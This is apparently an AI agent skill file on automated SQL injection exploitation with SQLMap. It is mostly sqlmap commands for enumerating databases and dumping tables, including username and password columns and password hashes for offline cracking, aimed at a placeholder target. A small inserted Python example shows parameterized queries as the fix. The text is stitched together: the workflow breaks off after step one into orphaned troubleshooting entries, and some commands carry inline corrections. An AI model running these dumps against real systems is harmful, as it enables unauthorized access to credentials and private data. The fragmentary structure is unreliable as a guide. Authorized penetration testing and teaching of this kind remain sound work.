This skill should be used when the user asks to "automate SQL injection testing," "enumerate database structure," "extract database credentials using sqlmap," "dump tables and columns from a vulnerable database," or "perform automated database penetration testing." It provides comprehensive guidance for using SQLMap to detect and exploit SQL injection vulnerabilities.
Provide systematic methodologies for automated SQL injection detection and exploitation using SQLMap. This skill covers database enumeration, table and column discovery, data extraction, multiple target specification methods, and advanced exploitation techniques for MySQL, PostgreSQL, MSSQL, Oracle, and other database management systems.
Inputs / Prerequisites
Target URL: Web application URL with injectable parameter (e.g., ?id=1)
SQLMap Installation: Pre-installed on Kali Linux or downloaded from GitHub
Verified Injection Point: URL parameter confirmed or suspected to be SQL injectable
Request File (Optional): Burp Suite captured HTTP request for POST-based injection
Authorization: Written permission for penetration testing activities
Outputs / Deliverables
Database Enumeration: List of all databases on the target server
Table Structure: Complete table names within target database
Column Mapping: Column names and data types for each table
Extracted Data: Dumped records including usernames, passwords, and sensitive data
Hash Values: Password hashes for offline cracking
Vulnerability Report: Confirmation of SQL injection type and severity
Core Workflow
1. Identify SQL Injection Vulnerability
Manual Verification
# Add single quote to break query
http://target.com/page.php?id=1'
# If a database error message appears, the parameter is likely SQL injectable
# Error example: "You have an error in your SQL syntax"
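Why the single quote produces that error, and what the fix looks like, as an added example (not part of the original skill). It assumes a constructed in-memory SQLite table and hypothetical lookup functions standing in for page.php:

```python
import sqlite3


def make_db():
    """Build an in-memory database with constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pages (id INTEGER, title TEXT)")
    conn.executemany("INSERT INTO pages VALUES (?, ?)",
                     [(1, "Home"), (2, "About")])
    return conn


def lookup_vulnerable(conn, page_id):
    """String concatenation: the id value becomes part of the SQL text."""
    query = "SELECT title FROM pages WHERE id = " + page_id
    return conn.execute(query).fetchall()


def lookup_hardened(conn, page_id):
    """Bound parameter: the id value is passed as data, never parsed as SQL."""
    return conn.execute("SELECT title FROM pages WHERE id = ?",
                        (page_id,)).fetchall()


def probe(lookup, conn, page_id):
    """Return ('ok', rows), or ('sql_error', message) as an error page would."""
    try:
        return ("ok", lookup(conn, page_id))
    except sqlite3.Error as exc:
        return ("sql_error", str(exc))


if __name__ == "__main__":
    conn = make_db()
    # "1" is a normal request; "1'" is the manual check from the text above.
    for value in ("1", "1'"):
        print(repr(value), "vulnerable:", probe(lookup_vulnerable, conn, value))
        print(repr(value), "hardened:  ", probe(lookup_hardened, conn, value))
```

With the bound parameter the quote never reaches the SQL parser, so the same request returns an empty result instead of a syntax error.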
Initial SQLMap Scan
# Basic vulnerability detection
sqlmap -u "http://target.com/page.php?id=1" --batch
# With verbosity for detailed output
sqlmap -u "http://target.com/page.php?id=1" --batch -v 3
Cause: Default time delay too conservative
Solution:
# Reduce time delay (risky, may cause false negatives)
sqlmap -u "URL" --dbs --batch --time-sec=3
# Use boolean-based instead if possible
sqlmap -u "URL" --dbs --batch --technique=B
Issue: Cannot Dump Large Tables
Cause: Table has too many records
Solution:
# Limit number of records
sqlmap -u "URL" -D db -T table --dump --batch --start=1 --stop=100
# Dump specific columns only
sqlmap -u "URL" -D db -T table -C username,password --dump --batch
# --exclude-sysdbs skips system databases during enumeration; it does not exclude columns (select columns with -C as above)
sqlmap -u "URL" -D db -T table --dump --batch --exclude-sysdbs
Issue: Session Drops During Long Scan
Cause: Session timeout or connection reset
Solution:
# Save and resume session
sqlmap -u "URL" --dbs --batch --output-dir=/root/sqlmap_session
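# Resume from saved session: rerun with the same --output-dir; sqlmap reuses the stored session automatically (there is no --resume option)
sqlmap -u "URL" --dbs --batch --output-dir=/root/sqlmap_session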
# Use persistent HTTP connection
sqlmap -u "URL" --dbs --batch --keep-alive